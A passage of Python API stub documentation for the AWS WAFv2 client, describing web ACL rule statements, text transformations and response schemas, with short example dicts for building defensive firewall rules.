Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
XssMatchStatement (dict) --
A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-side scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
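As an illustrative sketch only (not part of the API reference), an XssMatchStatement that inspects the query string, URL-decoding and then HTML-entity-decoding it before inspection, could be written as the following dict. The priority values are arbitrary examples.
# Sketch of an XssMatchStatement; the Priority values are illustrative.
xss_statement = {
    'XssMatchStatement': {
        'FieldToMatch': {'QueryString': {}},
        'TextTransformations': [
            {'Priority': 0, 'Type': 'URL_DECODE'},          # applied first (lowest priority value)
            {'Priority': 1, 'Type': 'HTML_ENTITY_DECODE'},  # applied second
        ],
    }
}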
SizeConstraintStatement (dict) --
A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --
The operator to use to compare the request part to the size setting.
Size (integer) --
The size, in bytes, to compare to the request part, after any transformations.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
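A minimal sketch, following the 8 KB guidance above, of a SizeConstraintStatement that matches request bodies larger than 8192 bytes (pair it with a Block action to enforce the limit):
# Sketch: match bodies over 8 KB, complementing body-inspection statements.
size_statement = {
    'SizeConstraintStatement': {
        'FieldToMatch': {'Body': {}},
        'ComparisonOperator': 'GT',
        'Size': 8192,
        'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
    }
}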
GeoMatchStatement (dict) --
A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --
An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
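For illustration, the [ "US", "CN" ] example above translates directly to the following statement dict:
# Sketch: match requests originating from the United States or China.
geo_statement = {
    'GeoMatchStatement': {
        'CountryCodes': ['US', 'CN'],
    }
}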
RuleGroupReferenceStatement (dict) --
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
IPSetReferenceStatement (dict) --
A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the IPSet that this statement references.
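A sketch of the workflow described above, assuming a hypothetical IP set name; CreateIPSet returns a Summary whose ARN the statement references:
import boto3

client = boto3.client('wafv2', region_name='us-east-1')

# Create the IP set once, then reference its ARN from any number of rules.
ip_set = client.create_ip_set(
    Name='example-ip-set',  # hypothetical name
    Scope='REGIONAL',
    IPAddressVersion='IPV4',
    Addresses=['192.0.2.44/32'],
)
ip_statement = {
    'IPSetReferenceStatement': {
        'ARN': ip_set['Summary']['ARN'],
    }
}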
RegexPatternSetReferenceStatement (dict) --
A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn't case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn't case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don't need to inspect more than 8 KB, you can guarantee that you don't allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn't support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don't need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you're concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " ' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
\f, formfeed, decimal 12
\t, tab, decimal 9
\n, newline, decimal 10
\r, carriage return, decimal 13
\v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces &quot; with "
Replaces &nbsp; with a non-breaking space, decimal 160
Replaces &lt; with a "less than" symbol
Replaces &gt; with >
Replaces characters that are represented in hexadecimal format, &#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, &#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don't want any text transformations.
RateBasedStatement (dict) --
A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specifies the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
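A sketch of the example above: a rate limit of 1,000 scoped down with an AND statement to requests from 192.0.2.44 whose User-Agent header contains BadBot. The IP set ARN shown is a hypothetical placeholder for a set containing 192.0.2.44/32.
rate_statement = {
    'RateBasedStatement': {
        'Limit': 1000,
        'AggregateKeyType': 'IP',
        'ScopeDownStatement': {
            'AndStatement': {
                'Statements': [
                    {'IPSetReferenceStatement': {
                        # hypothetical ARN of an IP set containing 192.0.2.44/32
                        'ARN': 'arn:aws:wafv2:us-east-1:123456789012:regional/ipset/example/abc123',
                    }},
                    {'ByteMatchStatement': {
                        'SearchString': b'BadBot',  # the SDK base64-encodes this for you
                        'FieldToMatch': {'SingleHeader': {'Name': 'user-agent'}},
                        'TextTransformations': [{'Priority': 0, 'Type': 'NONE'}],
                        'PositionalConstraint': 'CONTAINS',
                    }},
                ]
            }
        },
    }
}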
Limit (integer) --
The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopeDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --
Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --
An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
AndStatement (dict) --
A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --
The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --
A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --
The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --
A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --
The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can't nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
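A sketch of referencing a managed rule group; the vendor and group names would come from ListAvailableManagedRuleGroups, and the excluded rule name here is a hypothetical example of a rule to override to COUNT:
import boto3

client = boto3.client('wafv2', region_name='us-east-1')
available = client.list_available_managed_rule_groups(Scope='REGIONAL')

managed_statement = {
    'ManagedRuleGroupStatement': {
        'VendorName': 'AWS',
        'Name': 'AWSManagedRulesCommonRuleSet',
        'ExcludedRules': [
            {'Name': 'SizeRestrictions_BODY'},  # hypothetical rule to set to COUNT
        ],
    }
}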
Action (dict) --
The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don't override the rule action setting.
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can't contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can't change a MetricName after you create a VisibilityConfig .
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
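A minimal sketch of that optimistic-locking flow, assuming a hypothetical helper that re-reads the entity and retries on a lock conflict:
import boto3
from botocore.exceptions import ClientError

client = boto3.client('wafv2', region_name='us-east-1')

def update_rule_group_description(name, scope, rule_group_id, description):
    # Re-read the entity and its LockToken, then pass the token back on update.
    for _ in range(3):  # a few retries on lock conflicts
        resp = client.get_rule_group(Name=name, Scope=scope, Id=rule_group_id)
        group = resp['RuleGroup']
        try:
            return client.update_rule_group(
                Name=name,
                Scope=scope,
                Id=rule_group_id,
                Description=description,
                Rules=group.get('Rules', []),
                VisibilityConfig=group['VisibilityConfig'],
                LockToken=resp['LockToken'],
            )
        except ClientError as err:
            # Another writer changed the entity; fetch a fresh token and retry.
            if err.response['Error']['Code'] != 'WAFOptimisticLockException':
                raise
    raise RuntimeError('could not update rule group after repeated lock conflicts')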
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'RuleGroup': {
'Name': 'string',
'Id': 'string',
'Capacity': 123,
'ARN': 'string',
'Description': 'string',
'Rules': [
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {},
'Allow': {},
'Count': {}
},
'OverrideAction': {
'Count': {},
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
'LockToken': 'string'
}
:returns:
Method : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.
UriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .
"""
pass
def get_sampled_requests(WebAclArn=None, RuleMetricName=None, Scope=None, TimeWindow=None, MaxItems=None):
"""
Gets detailed information about a specified number of requests--a sample--that AWS WAF randomly selects from among the first 5,000 requests that your AWS resource received during a time range that you choose. You can specify a sample size of up to 500 requests, and you can specify any time range in the previous three hours.
See also: AWS API Documentation
Exceptions
:example: response = client.get_sampled_requests(
WebAclArn='string',
RuleMetricName='string',
Scope='CLOUDFRONT'|'REGIONAL',
TimeWindow={
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
},
MaxItems=123
)
:type WebAclArn: string
:param WebAclArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the WebACL for which you want a sample of requests.\n
:type RuleMetricName: string
:param RuleMetricName: [REQUIRED]\nThe metric name assigned to the Rule or RuleGroup for which you want a sample of requests.\n
:type Scope: string
